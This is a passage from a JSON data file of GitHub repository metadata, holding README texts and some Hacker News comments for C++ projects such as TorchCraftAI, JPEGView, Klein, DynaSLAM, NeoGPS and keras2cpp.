IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\nTHE SOFTWARE.\n\n[1]: http://1drv.ms/1i10uuX\n[2]: screenshot/img1.png\n[3]: library/src/cn/Ragnarok/BitmapFilter.java\n[4]: https://github.com/ragnraok/android-image-filter/issues?state=open\n\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "TorchCraft/TorchCraftAI", "link": "https://github.com/TorchCraft/TorchCraftAI", "tags": [], "stars": 643, "description": "A platform that lets you build agents to learn to play StarCraft: Brood War.", "lang": "C++", "repo_lang": "", "readme": "# TorchCraftAI\n\nTorchCraftAI is a platform that lets you build agents to play (and learn to play) *StarCraft\u00ae: Brood War\u00ae*\u2020. TorchCraftAI includes:\n- A modular framework for building StarCraft agents\n- CherryPi, a bot which plays complete games of StarCraft (1st place SSCAIT 2017-18)\n- A reinforcement learning environment with minigames, models, and training loops\n- TorchCraft support for TCP communication with StarCraft and BWAPI\n- Support for Linux, Windows, and OSX\n\n## Get started\n\nSee guides for:\n\n- [Linux](https://torchcraft.github.io/TorchCraftAI/docs/install-linux.html)\n- [Windows](https://torchcraft.github.io/TorchCraftAI/docs/install-windows.html)\n- [OSX](https://torchcraft.github.io/TorchCraftAI/docs/install-macos.html)\n\n## Documentation\n\n* [Home](https://torchcraft.github.io/TorchCraftAI)\n* [Architecture overview](https://torchcraft.github.io/TorchCraftAI/docs/architecture.html)\n* [Code reference](https://torchcraft.github.io/TorchCraftAI/reference/)\n\n### Tutorials\n\n* [Train a model to place buildings](https://torchcraft.github.io/TorchCraftAI/docs/bptut-intro.html)\n* [Train a model to fight](https://torchcraft.github.io/TorchCraftAI/docs/microtut-intro.html)\n\n## Licensing\n\nWe encourage you to experiment with TorchCraftAI! See [LICENSE](https://github.com/TorchCraft/TorchCraftAI/blob/master/LICENSE), plus more on [contributing](https://github.com/TorchCraft/TorchCraftAI/blob/master/CONTRIBUTING.md) and our [code of conduct](https://github.com/TorchCraft/TorchCraftAI/blob/master/CODE_OF_CONDUCT.md).\n\n\u2020: StarCraft is a trademark or registered trademark of Blizzard Entertainment, Inc., in the U.S. and/or other countries. Nothing in this repository should be construed as approval, endorsement, or sponsorship by Blizzard Entertainment, Inc.\n", "readme_type": "markdown", "hn_comments": "Does anyone know if this is headless or if it needs to render the game elements? Can I inject macros with this? That is, can I be playing a game, cue the AI to do some micro for me then let me keep playing? 
I assume there are other tools to do this but I would think they would interact with my mouse cursor rather than the BWAPI.Brood War AI may end up being a significantly easier problem (with this formulation) than DeepMind's StarCraft II research environment for several reasons:+ As others have mentioned: Brood War is significantly cheaper to run (can be headless, runs well on ancient CPU), making it more amenable to the self-play with massive numbers of games approach+ Brood War benefits significantly (arguably more than SC2) from skilled micromanagement, which is arguably easier to exploit as it doesn't require long-term/high level planning (but requires a generous actions per minute cap)+ This API doesn't require the AI to also do simple computer vision/recognition of the game (vs. DeepMind's simplified graphical representation)+ This API interfaces with game actions directly (BWAPI) vs. mouse/keyboard level actionsIt'll be interesting to see which problem (Brood War vs. StarCraft II) gets solved to a compelling degree with learning first.Are there any resulting data we can look at? Did anybody find wrote about actually running this for a while and seeing anything cool emerge?Am I going to start getting targeted ads based on my build order and actions per minute?I would love to see games with life long learning. It learns to beat u then and you have to learn to beat it to continue the game.Side question, is there any free games you can develop ai strategy/tactics for, having an active community? Maybe designed exactly for that kind of purpose? The platform and license issues with Starcraft are just too much of a barrier.The timing of this project is a bit unfortunate since Blizzard and DeepMind announced a month ago that they would be releasing an API to use StarCraft 2 for AI research:https://deepmind.com/blog/deepmind-and-blizzard-release-star...Plus: StarCraft 2 has a free edition (not enough people know this), so you will most likely be able to use SC2 for research without needing to buy a licence.\"We present TorchCraft, a library that enables deep learning research on Real-Time Strategy (RTS) games such as StarCraft: Brood War, by making it easier to control these games from a machine learning framework, here Torch. This white paper argues for using RTS games as a benchmark for AI research, and describes the design and components of TorchCraft.\" Via link in the READMEhttps://arxiv.org/abs/1611.00625", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "opensource-apple/dyld", "link": "https://github.com/opensource-apple/dyld", "tags": [], "stars": 643, "description": null, "lang": "C++", "repo_lang": "", "readme": "", "readme_type": "text", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "sylikc/jpegview", "link": "https://github.com/sylikc/jpegview", "tags": ["image-viewer", "image-processing"], "stars": 643, "description": "Fork of JPEGView by David Kleiner - fast and highly configurable viewer/editor for JPEG, BMP, PNG, WEBP, TGA, GIF and TIFF images with a minimal GUI. 
Basic on-the-fly image processing is provided - allowing adjusting typical parameters as sharpness, color balance, rotation, perspective, contrast and local under-/overexposure.", "lang": "C++", "repo_lang": "", "readme": "[![Documentation](https://img.shields.io/badge/Docs-Outdated-yellowgreen)](https://htmlpreview.github.io/?https://github.com/sylikc/jpegview/blob/master/src/JPEGView/Config/readme.html) [![Localization Progress](https://img.shields.io/badge/Localized-82%25-blueviolet)](https://github.com/sylikc/jpegview/wiki/Localization) [![Build x64](https://github.com/sylikc/jpegview/actions/workflows/build-release-x64.yml/badge.svg?branch=master)](https://github.com/sylikc/jpegview/actions/workflows/build-release-x64.yml) [![OS Support](https://img.shields.io/badge/Windows-XP%20%7C%207%20%7C%208%20%7C%2010%20%7C%2011-blue)](#) [![License: GPL v2](https://img.shields.io/badge/License-GPL%20v2-blue)](https://github.com/sylikc/jpegview/blob/master/LICENSE.txt)\n\n[![Latest GitHub Release](https://img.shields.io/github/v/release/sylikc/jpegview?label=GitHub&style=social)](https://github.com/sylikc/jpegview/releases)[![Downloads](https://badgen.net/github/assets-dl/sylikc/jpegview?cache=3600&color=grey&label=)](#) [![WinGet](https://img.shields.io/badge/WinGet-Current-green)](https://winstall.app/apps/sylikc.JPEGView) [![PortableApps](https://img.shields.io/badge/PortableApps-Current-green)](https://portableapps.com/apps/graphics_pictures/jpegview_portable) [![Chocolatey](https://img.shields.io/chocolatey/v/jpegview)](https://community.chocolatey.org/packages/jpegview)\n\n# JPEGView - Image Viewer and Editor\n\nThis is the official re-release of JPEGView.\n\n## Description\n\nJPEGView is a lean, fast and highly configurable image viewer/editor with a minimal GUI.\n\n### Formats Supported\n\nJPEGView has built-in support for the following formats:\n\n* Popular: JPEG, GIF\n* Lossless: BMP, PNG, TIFF\n* Web: WEBP, JXL, HEIF/HEIC, AVIF\n* Legacy: TGA, WDP, HDP, JXR\n* Camera RAW formats:\n * Adobe (DNG), Canon (CRW, CR2), Nikon (NEF, NRW), Sony (ARW, SR2)\n * Olympus (ORF), Panasonic (RW2), Fujifilm (RAF)\n * Sigma (X3F), Pentax (PEF), Minolta (MRW), Kodak (KDC, DCR)\n\nMany additional formats are supported by Windows Imaging Component (WIC)\n\n### Basic Image Editor\n\nBasic on-the-fly image processing is provided - allowing adjusting typical parameters:\n\n* sharpness\n* color balance\n* rotation\n* perspective\n* contrast\n* local under-/over-exposure\n\n### Other Features:\n\n* Small and fast, uses SSE2 and up to 4 CPU cores\n* High quality resampling filter, preserving sharpness of images\n* Basic image processing tools can be applied in real time during viewing\n* Movie/Slideshow mode - to play a folder of JPEGs as a movie\n\n# Installation\n\n## Official Releases\n\nOfficial releases will be made to [sylikc's GitHub Releases](https://github.com/sylikc/jpegview/releases) page. Each release includes:\n\n* **Archive Zip/7z** - Portable\n* **Windows Installer MSI** - For Installs\n* **Source code** - Build it yourself\n\n## Portable\n\nJPEGView _does not require installation_ to run. Just **unzip and run** either the 64-bit or the 32-bit version, depending on which platform you're on. It can save the settings to the extracted folder and remain entirely portable.\n\n## MSI Installer\n\nFor those who prefer to have JPEGView installed for All Users, a 32-bit/64-bit installer is available to download starting with v1.0.40. 
(Unfortunately, I don't own a code signing certificate yet, so the MSI release is not signed. Please verify checksums!)\n\n### WinGet\n\nIf you're on Windows 11 or Windows 10 (build 1709 or later), you can also download it directly from the official [Microsoft WinGet tool](https://docs.microsoft.com/en-us/windows/package-manager/winget/) repository. This downloads the latest MSI installer directly from GitHub for installation.\n\nExample Usage:\n\nC:\\> `winget search jpegview`\n```\nName Id Version Source\n-----------------------------------------\nJPEGView sylikc.JPEGView 1.0.39.1 winget\n```\n\nC:\\> `winget install jpegview`\n```\nFound JPEGView [sylikc.JPEGView] Version 1.0.39.1\nThis application is licensed to you by its owner.\nMicrosoft is not responsible for, nor does it grant any licenses to, third-party packages.\nDownloading https://github.com/sylikc/jpegview/releases/download/v1.0.39.1-wix/JPEGView64_en-us_1.0.39.1.msi\n ============================== 2.13 MB / 2.13 MB\nSuccessfully verified installer hash\nStarting package install...\nSuccessfully installed\n```\n\n## PortableApps\n\nAnother option is to use the official [JPEGView on PortableApps](https://portableapps.com/apps/graphics_pictures/jpegview_portable) package. The PortableApps launcher preserves user settings in a separate directory from the extracted application directory. This release is signed.\n\n## System Requirements\n\n* 32-bit version: Windows 7 or later\n * A special _32-bit Windows XP SP2_ build is available, which supports most formats (except for formats added after v1.0.37.1, e.g. Animated PNG, JXL, HEIC). Other features and options are the same as the normal builds.\n\n* 64-bit version: Windows 7/8/10/11 64-bit or later\n\n\n## What's New\n\n* See what has changed in the [latest releases](https://github.com/sylikc/jpegview/releases)\n* Or check the [CHANGELOG.txt](https://github.com/sylikc/jpegview/blob/master/CHANGELOG.txt) to review new features in detail.\n\n# Help / Documentation\n\nThe JPEGView documentation is a little out of date at the moment, but should still give a good summary of the features.\n\nThis [readme.html](https://htmlpreview.github.io/?https://github.com/sylikc/jpegview/blob/master/src/JPEGView/Config/readme.html) is part of the JPEGView package.\n\n\n# Brief History\n\nThis GitHub repo continues the legacy (is a \"fork\") of the excellent project [JPEGView by David Kleiner](https://sourceforge.net/projects/jpegview/). Unfortunately, starting in 2020, the SourceForge project has essentially been abandoned, with the last update being [2018-02-24 (1.0.37)](https://sourceforge.net/projects/jpegview/files/jpegview/). It's an excellent lightweight image viewer that I use almost daily!\n\nThe starting point for this repo was a direct clone from SourceForge SVN to GitHub Git. By continuing this way, it retains all previous commits and all original author comments. \n\nI'm hoping that with this project, some devs might help me keep the project alive! It's been a while, and it could use some new features and updates. I'm looking forward to the community making suggestions, and to devs helping out with pull requests, as some of the image code is quite a learning curve for me to pick up. 
-sylikc\n\n## Special Thanks\n\nSpecial thanks to [qbnu](https://github.com/qbnu) for adding additional codec support!\n* Animated WebP\n* Animated PNG\n* JPEG XL with animation support\n* HEIF/HEIC/AVIF support\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "jeremyong/klein", "link": "https://github.com/jeremyong/klein", "tags": ["dual-quaternions", "pga", "sse", "geometric-algebra", "projective-geometry", "3d", "3d-graphics", "animation", "inverse-kinematics", "algebra", "quaternions", "quaternion-algebra", "simd"], "stars": 644, "description": "P(R*_{3, 0, 1}) specialized SIMD Geometric Algebra Library", "lang": "C++", "repo_lang": "", "readme": "# [Klein](https://jeremyong.com/klein)\r\n\r\n[![License: MIT](https://img.shields.io/badge/License-MIT-blueviolet.svg)](https://opensource.org/licenses/MIT)\r\n[![DOI](https://zenodo.org/badge/236777729.svg)](https://zenodo.org/badge/latestdoi/236777729)\r\n\r\n[![Build Status](https://travis-ci.org/jeremyong/klein.svg?branch=master)](https://travis-ci.org/jeremyong/klein)\r\n[![Build Status](https://ci.appveyor.com/api/projects/status/w3ug2ad08jyved8o?svg=true)](https://ci.appveyor.com/project/jeremyong/klein)\r\n[![Coverity Status](https://img.shields.io/coverity/scan/20402.svg)](https://scan.coverity.com/projects/jeremyong-klein)\r\n[![Codacy Badge](https://api.codacy.com/project/badge/Grade/5908bd446f3d4bb0bb1fd2e0808cb8a1)](https://www.codacy.com/manual/jeremyong/klein?utm_source=github.com&utm_medium=referral&utm_content=jeremyong/klein&utm_campaign=Badge_Grade)\r\n\r\n\ud83d\udc49\ud83d\udc49 [Project Site](https://jeremyong.com/klein) \ud83d\udc48\ud83d\udc48\r\n\r\n## Description\r\n\r\nDo you need to do any of the following? Quickly? _Really_ quickly even?\r\n\r\n- Project points onto lines, lines onto planes, points onto planes?\r\n- Measure distances and angles between points, lines, and planes?\r\n- Rotate or translate points, lines, and planes?\r\n- Perform smooth rigid body transforms? Interpolate them smoothly?\r\n- Construct lines from points? Planes from points? Planes from a line and a point?\r\n- Intersect planes to form lines? Intersect planes and lines to form points?\r\n\r\nIf so, then Klein is the library for you!\r\n\r\nKlein is an implementation of `P(R*_{3, 0, 1})`, aka 3D Projective Geometric Algebra.\r\nIt is designed for applications that demand high-throughput (animation libraries,\r\nkinematic solvers, etc). In contrast to other GA libraries, Klein does not attempt to\r\ngeneralize the metric or dimensionality of the space. In exchange for this loss of generality,\r\nKlein implements the algebraic operations using the full weight of SSE (Streaming\r\nSIMD Extensions) for maximum throughput.\r\n\r\n## Requirements\r\n\r\n- Machine with a processor that supports SSE3 or later (Steam hardware survey reports 100% market penetration)\r\n- C++11/14/17 compliant compiler (tested with GCC 9.2.1, Clang 9.0.1, and Visual Studio 2019)\r\n- Optional SSE4.1 support\r\n\r\n## Usage\r\n\r\nYou have two options to use Klein in your codebase. First, you can simply copy the contents of the `public` folder somewhere in your include path. Alternatively, you can include this entire project in your source tree and, using CMake, `add_subdirectory(Klein)` and link the `klein::klein` interface target.\r\n\r\nIn your code, there is a single header to include via `#include <klein/klein.hpp>`, at which point you can create planes, points, lines, ideal lines, bivectors, motors, directions, and use their operations. Please refer to the [project site](https://jeremyong.com/klein) for the most up-to-date documentation.\r\n\r\n
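As a minimal sketch of such usage, assuming the `kln` types and operators documented on the project site (`kln::point`, `kln::line`, `kln::rotor`, and the `&` join operator); treat this as illustrative rather than canonical:\r\n\r\n```cpp\r\n#include <klein/klein.hpp>\r\n#include <cstdio>\r\n\r\nint main()\r\n{\r\n    // Two points in 3D space\r\n    kln::point p1{0.f, 0.f, 0.f};\r\n    kln::point p2{1.f, 0.f, 0.f};\r\n\r\n    // Join the points into the line passing through both of them\r\n    kln::line l = p1 & p2;\r\n\r\n    // A rotor encoding a rotation of pi/2 radians about the z-axis\r\n    kln::rotor r{3.14159265f * 0.5f, 0.f, 0.f, 1.f};\r\n\r\n    // Apply the rotor to a point via the call operator (conjugation)\r\n    kln::point p3 = r(p2);\r\n    std::printf(\"rotated: (%f, %f, %f)\\n\", p3.x(), p3.y(), p3.z());\r\n    return 0;\r\n}\r\n```\r\n\r\n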
## Motivation\r\n\r\nPGA fully streamlines the traditionally used quaternions and dual-quaternions into a single algebra.\r\nNormally, the onus is on the user to perform appropriate casts and ensure signs and memory layout\r\nare accounted for. Here, all types are unified within the geometric algebra,\r\nand operations such as applying quaternions or dual-quaternions (rotors/motors) to planes, points,\r\nand lines make sense. There is a surprising amount of uniformity in the algebra, which enables\r\nefficient implementation, a simple API, and reduced code size.\r\n\r\n## Performance Considerations\r\n\r\nIt is known that a \"better\" way to vectorize computation in general is to arrange the data in an SoA\r\nlayout to avoid unnecessary cross-lane arithmetic or unnecessary shuffling. PGA is unique in that\r\na given PGA multivector has a natural decomposition into 4 blocks of 4 floating-point quantities.\r\nFor the even sub-algebra (isomorphic to the space of dual-quaternions) also known as the _motor\r\nalgebra_, the geometric product can be densely packed and implemented efficiently using SSE.\r\n\r\n## References\r\n\r\nKlein is deeply indebted to several members of the GA community and their work. Beyond the works\r\ncited here, the author stands on the shoulders of giants (Felix _Klein_, Sophus Lie, Arthur Cayley,\r\nWilliam Rowan Hamilton, Julius Pl\u00fccker, and William Kingdon Clifford, among others).\r\n\r\n[1]\r\nGunn, Charles G. (2019).\r\nCourse notes Geometric Algebra for Computer Graphics, SIGGRAPH 2019.\r\n[arXiv link](https://arxiv.org/abs/2002.04509)\r\n\r\n[2]\r\nSteven De Keninck and Charles Gunn. (2019).\r\nSIGGRAPH 2019 Geometric Algebra Course.\r\n[youtube link](https://www.youtube.com/watch?v=tX4H_ctggYo)\r\n\r\n[3]\r\nLeo Dorst, Daniel Fontijne, Stephen Mann. (2007)\r\nGeometric Algebra for Computer Science.\r\nBurlington, MA: Morgan Kaufmann Publishers Inc.\r\n", "readme_type": "markdown", "hn_comments": "How do you write an article on skeletal animation, and have zero examples of what that skeletal animation looks like?Ninepoints is getting repeatedly rate-limited. He invites anyone with questions to ask questions in the Klein discord (https://discord.gg/gkbfnNy)Geometric algebra looks cool, and this library seems like exactly what is needed for graphics programmers to use it.What I'd really like to see is a comprehensive cheat sheet with formulas for common tasks in computer graphics with an absolute minimum of theory and jargon; even less than this article. Of course it's great to learn the theory too, but most people just call slerp in a quaternion library without learning the theory of quaternions. 
It should be possible to use a geometric algebra library in a similar way.Just a heads up - @ninepoints let me know he got rate limited and will answer as soon as allowed again ;)I'm the author of Klein and was surprised to see a sudden burst of traffic so I checked the usual suspects and ended up here :)My goals for authoring Klein was to provide a library for performing all manner of geometric operations using the language of Geometric Algebra. The benefits are that the formulism is exception-free (meaning, for example, parallel planes have a well-defined line of intersection, that projections to higher/lower grade entities make sense, etc), and works equally well on points, lines, and planes. Practitioners coming from robotics/animation will also find the entirety of the Lie algebra/group inside GA as well for smooth interpolation, etc.As a graphics engineer, I found most libraries out there unsuitable because of performance reasons. We're used to having nicely packed SIMD optimized quaternions for example. Klein fills this gap and (hopefully) in a manner where you can use it even if you don't understand the Geometric Algebra (yet!). Over time, I'd like to round out the documentation to explain the underlying theory, which I find unreasonably elegant and has shifted my thinking in the last few years.Let me know if you have any questions about Klein or geometric algebra!It would be nice to see a demo that compares the two methods of interpolation of the movements.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "BertaBescos/DynaSLAM", "link": "https://github.com/BertaBescos/DynaSLAM", "tags": ["slam", "dynamic", "rgb-d", "monocular", "stereo", "inpainting"], "stars": 642, "description": "DynaSLAM is a SLAM system robust in dynamic environments for monocular, stereo and RGB-D setups", "lang": "C++", "repo_lang": "", "readme": "# DynaSLAM\n\n[[Project]](https://bertabescos.github.io/DynaSLAM/) [[arXiv]](https://arxiv.org/abs/1806.05620) [[Journal]](https://ieeexplore.ieee.org/document/8421015)\n\nDynaSLAM is a visual SLAM system that is robust in dynamic scenarios for monocular, stereo and RGB-D configurations. Having a static map of the scene allows inpainting the frame background that has been occluded by such dynamic objects.\n\n\n\nDynaSLAM: Tracking, Mapping and Inpainting in Dynamic Scenes \n[Berta Bescos](http://bertabescos.github.io), [Jos\u00e9 M. F\u00e1cil](http://webdiis.unizar.es/~jmfacil/), [Javier Civera](http://webdiis.unizar.es/~jcivera/) and [Jos\u00e9 Neira](http://webdiis.unizar.es/~jneira/) \nRA-L and IROS, 2018\n\nWe provide examples to run the SLAM system in the [TUM dataset](http://projects.asl.ethz.ch/datasets/doku.php?id=kmavvisualinertialdatasets) as RGB-D or monocular, and in the [KITTI dataset](http://www.cvlibs.net/datasets/kitti/eval_odometry.php) as stereo or monocular.\n\n## News\n- DynaSLAM now supports both OpenCV 2.X and OpenCV 3.X.\n\n## Getting Started\n- Install ORB-SLAM2 prerequisites: C++11 or C++0x Compiler, Pangolin, OpenCV and Eigen3 (https://github.com/raulmur/ORB_SLAM2).\n- Install the Boost libraries with the command `sudo apt-get install libboost-all-dev`.\n- Install Python 2.7, Keras and TensorFlow, and download the `mask_rcnn_coco.h5` model from this GitHub repository: https://github.com/matterport/Mask_RCNN/releases. 
\n- Clone this repo and build it:\n```bash\ngit clone https://github.com/BertaBescos/DynaSLAM.git\ncd DynaSLAM\nchmod +x build.sh\n./build.sh\n```\n- Place the `mask_rcnn_coco.h5` model in the folder `DynaSLAM/src/python/`.\n\n## RGB-D Example on TUM Dataset\n- Download a sequence from http://vision.in.tum.de/data/datasets/rgbd-dataset/download and uncompress it.\n\n- Associate RGB images and depth images by executing the Python script [associate.py](http://vision.in.tum.de/data/datasets/rgbd-dataset/tools):\n\n ```\n python associate.py PATH_TO_SEQUENCE/rgb.txt PATH_TO_SEQUENCE/depth.txt > associations.txt\n ```\nThese association files are given in the folder `./Examples/RGB-D/associations/` for the TUM dynamic sequences.\n\n- Execute the following command. Change `TUMX.yaml` to TUM1.yaml, TUM2.yaml or TUM3.yaml for freiburg1, freiburg2 and freiburg3 sequences respectively. Change `PATH_TO_SEQUENCE_FOLDER` to the uncompressed sequence folder. Change `ASSOCIATIONS_FILE` to the path to the corresponding associations file. `PATH_TO_MASKS` and `PATH_TO_OUTPUT` are optional parameters.\n\n ```\n ./Examples/RGB-D/rgbd_tum Vocabulary/ORBvoc.txt Examples/RGB-D/TUMX.yaml PATH_TO_SEQUENCE_FOLDER ASSOCIATIONS_FILE (PATH_TO_MASKS) (PATH_TO_OUTPUT)\n ```\n \nIf `PATH_TO_MASKS` and `PATH_TO_OUTPUT` are **not** provided, only the geometrical approach is used to detect dynamic objects. \n\nIf `PATH_TO_MASKS` is provided, Mask R-CNN is used to segment the potential dynamic content of every frame. These masks are saved in the provided folder `PATH_TO_MASKS`. If this argument is `no_save`, the masks are used but not saved. If it finds the Mask R-CNN computed dynamic masks in `PATH_TO_MASKS`, it uses them but does not compute them again.\n\nIf `PATH_TO_OUTPUT` is provided, the inpainted frames are computed and saved in `PATH_TO_OUTPUT`.\n\n## Stereo Example on KITTI Dataset\n- Download the dataset (grayscale images) from http://www.cvlibs.net/datasets/kitti/eval_odometry.php \n\n- Execute the following command. Change `KITTIX.yaml` to KITTI00-02.yaml, KITTI03.yaml or KITTI04-12.yaml for sequences 0 to 2, 3, and 4 to 12 respectively. Change `PATH_TO_DATASET_FOLDER` to the uncompressed dataset folder. Change `SEQUENCE_NUMBER` to 00, 01, 02, ..., 11. By providing the last argument `PATH_TO_MASKS`, dynamic objects are detected with Mask R-CNN.\n```\n./Examples/Stereo/stereo_kitti Vocabulary/ORBvoc.txt Examples/Stereo/KITTIX.yaml PATH_TO_DATASET_FOLDER/dataset/sequences/SEQUENCE_NUMBER (PATH_TO_MASKS)\n```\n\n## Monocular Example on TUM Dataset\n- Download a sequence from http://vision.in.tum.de/data/datasets/rgbd-dataset/download and uncompress it.\n\n- Execute the following command. Change `TUMX.yaml` to TUM1.yaml, TUM2.yaml or TUM3.yaml for freiburg1, freiburg2 and freiburg3 sequences respectively. Change `PATH_TO_SEQUENCE_FOLDER` to the uncompressed sequence folder. By providing the last argument `PATH_TO_MASKS`, dynamic objects are detected with Mask R-CNN.\n```\n./Examples/Monocular/mono_tum Vocabulary/ORBvoc.txt Examples/Monocular/TUMX.yaml PATH_TO_SEQUENCE_FOLDER (PATH_TO_MASKS)\n```\n\n## Monocular Example on KITTI Dataset\n- Download the dataset (grayscale images) from http://www.cvlibs.net/datasets/kitti/eval_odometry.php \n\n- Execute the following command. Change `KITTIX.yaml` to KITTI00-02.yaml, KITTI03.yaml or KITTI04-12.yaml for sequences 0 to 2, 3, and 4 to 12 respectively. Change `PATH_TO_DATASET_FOLDER` to the uncompressed dataset folder. Change `SEQUENCE_NUMBER` to 00, 01, 02, ..., 11. 
By providing the last argument `PATH_TO_MASKS`, dynamic objects are detected with Mask R-CNN.\n```\n./Examples/Monocular/mono_kitti Vocabulary/ORBvoc.txt Examples/Monocular/KITTIX.yaml PATH_TO_DATASET_FOLDER/dataset/sequences/SEQUENCE_NUMBER (PATH_TO_MASKS)\n```\n\n\n## Citation\n\nIf you use DynaSLAM in an academic work, please cite:\n\n    @article{bescos2018dynaslam,\n      title={{DynaSLAM}: Tracking, Mapping and Inpainting in Dynamic Environments},\n      author={Bescos, Berta, F\\'acil, JM., Civera, Javier and Neira, Jos\\'e},\n      journal={IEEE RA-L},\n      year={2018}\n     }\n\n## Acknowledgements\nOur code builds on [ORB-SLAM2](https://github.com/raulmur/ORB_SLAM2).\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "SlashDevin/NeoGPS", "link": "https://github.com/SlashDevin/NeoGPS", "tags": ["gps", "nmea", "arduino"], "stars": 642, "description": "NMEA and ublox GPS parser for Arduino, configurable to use as few as 10 bytes of RAM", "lang": "C++", "repo_lang": "", "readme": "NeoGPS\n======\n\nThis fully-configurable Arduino library uses _**minimal**_ RAM, PROGMEM and CPU time, \nrequiring as few as _**10 bytes of RAM**_, **866 bytes of PROGMEM**, and **less than 1 ms of CPU time** per sentence. \n\nIt supports the following protocols and messages:\n\n#### NMEA 0183\n* GPGGA - System fix data\n* GPGLL - Geographic Latitude and Longitude\n* GPGSA - DOP and active satellites\n* GPGST - Pseudo Range Error Statistics\n* GPGSV - Satellites in View\n* GPRMC - Recommended Minimum specific GPS/Transit data\n* GPVTG - Course over ground and Ground speed\n* GPZDA - UTC Time and Date\n\nThe \"GP\" prefix usually indicates an original [GPS](https://en.wikipedia.org/wiki/Satellite_navigation#GPS) source. NeoGPS parses *all* Talker IDs, including\n * \"GL\" ([GLONASS](https://en.wikipedia.org/wiki/Satellite_navigation#GLONASS)),\n * \"BD\" or \"GB\" ([BeiDou](https://en.wikipedia.org/wiki/Satellite_navigation#BeiDou)),\n * \"GA\" ([Galileo](https://en.wikipedia.org/wiki/Satellite_navigation#Galileo)), and\n * \"GN\" (mixed)\n\nThis means that GLRMC, GBRMC or BDRMC, GARMC and GNRMC from the latest GPS devices (e.g., ublox M8N) will also be correctly parsed. See discussion of Talker IDs in [Configurations](extras/doc/Configurations.md#enabledisable-the-talker-id-and-manufacturer-id-processing).\n\nMost applications can be fully implemented with the standard NMEA messages above. They are supported by almost all GPS manufacturers. Additional messages can be added through derived classes (see ublox and Garmin sections below).\n\nMost applications will use this simple, familiar loop structure:\n```\nNMEAGPS gps;\ngps_fix fix;\n\nvoid loop()\n{\n while (gps.available( gps_port )) {\n fix = gps.read();\n doSomeWork( fix );\n }\n}\n```\nFor more information on this loop, see the [Usage](extras/doc/Data%20Model.md#usage) section on the [Data Model](extras/doc/Data%20Model.md) page.\n\n
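As a sketch of what `doSomeWork` might do with each fix (assuming the `gps_fix` members documented on the Data Model page, such as `valid.location`, `latitude()` and `longitude()`; illustrative only, not part of the library):\n```\n#include <NMEAGPS.h>\n\n// Print the location whenever the merged fix contains a valid one\nvoid doSomeWork( const gps_fix & fix )\n{\n  if (fix.valid.location) {\n    Serial.print( fix.latitude(), 6 );\n    Serial.print( ',' );\n    Serial.println( fix.longitude(), 6 );\n  }\n}\n```\n\n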
(This is the plain Arduino version of the [CosaGPS](https://github.com/SlashDevin/CosaGPS) library for [Cosa](https://github.com/mikaelpatel/Cosa).)\n\nGoals\n======\nIn an attempt to be reusable in a variety of different programming styles, this library supports:\n* resource-constrained environments (e.g., ATTINY targets)\n* sync or async operation (reading in `loop()` vs interrupt processing)\n* event or polling (deferred handling vs. continuous calls in `loop()`)\n* coherent fixes (merged from multiple sentences) vs. individual sentences\n* optional buffering of fixes\n* optional floating point\n* configurable message sets, including hooks for implementing proprietary NMEA messages\n* configurable message fields\n* multiple protocols from same device\n* any kind of input stream (Serial, [NeoSWSerial](https://github.com/SlashDevin/NeoSWSerial), I2C, PROGMEM arrays, etc.)\n\nInconceivable!\n=============\n\nDon't believe it? Check out these detailed sections:\n\nSection | Description\n-------- | ------------\n[License](LICENSE) | The Fine Print\n[Installing](extras/doc/Installing.md) | Copying files\n[Data Model](extras/doc/Data%20Model.md) | How to parse and use GPS data\n[Configurations](extras/doc/Configurations.md) | Tailoring NeoGPS to your needs\n[Performance](extras/doc/Performance.md) | 37% to 72% faster! Really!\n[RAM requirements](extras/doc/RAM.md) | Doing it without buffers!\n[Program Space requirements](extras/doc/Program.md) | Making it fit\n[Examples](extras/doc/Examples.md) | Programming styles\n[Troubleshooting](extras/doc/Troubleshooting.md) | Troubleshooting\n[Extending NeoGPS](extras/doc/Extending.md) | Using specific devices\n[ublox](extras/doc/ublox.md) | ublox-specific code\n[Garmin](extras/doc/Garmin.md) | Garmin-specific code\n[Tradeoffs](extras/doc/Tradeoffs.md) | Comparing to other libraries\n[Acknowledgements](extras/doc/Acknowledgements.md) | Thanks!\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "pplonski/keras2cpp", "link": "https://github.com/pplonski/keras2cpp", "tags": ["neural-network", "keras", "machine-learning"], "stars": 642, "description": "This is a bunch of code to port Keras neural network model into pure C++.", "lang": "C++", "repo_lang": "", "readme": "# keras2cpp\n\nThis is a bunch of code to port Keras neural network models into pure C++. Neural network weights and architecture are stored in a plain text file, and input is presented as a `vector<vector<vector<float> > >` in the case of an image. The code is prepared to support a simple convolutional network (from the MNIST example) but can be easily extended. Only ReLU and Softmax activations are implemented.\n\nIt works with the Theano backend.\n\n## Usage\n\n 1. Save your network weights and architecture.\n 2. Dump the network structure to a plain text file with the `dump_to_simple_cpp.py` script.\n 3. Use the network with the code from the `keras_model.h` and `keras_model.cc` files - see the example below.\n\n## Example\n\n 1. Run one iteration of a simple CNN on MNIST data with the `example/mnist_cnn_one_iteration.py` script. It will produce a file with the architecture, `example/my_nn_arch.json`, and weights in HDF5 format, `example/my_nn_weights.h5`.\n 2. Dump the network to a plain text file: `python dump_to_simple_cpp.py -a example/my_nn_arch.json -w example/my_nn_weights.h5 -o example/dumped.nnet`.\n 3. Compile the example: `g++ -std=c++11 keras_model.cc example_main.cc` - see the code in `example_main.cc`.\n 4. Run the binary: `./a.out` - you should get the same output as in step one from Keras.\n\n## Testing\n\nIf you want to test dumping for your network, please use the `test_run.sh` script. Provide your network architecture and weights there. The script does the following:\n\n 1. 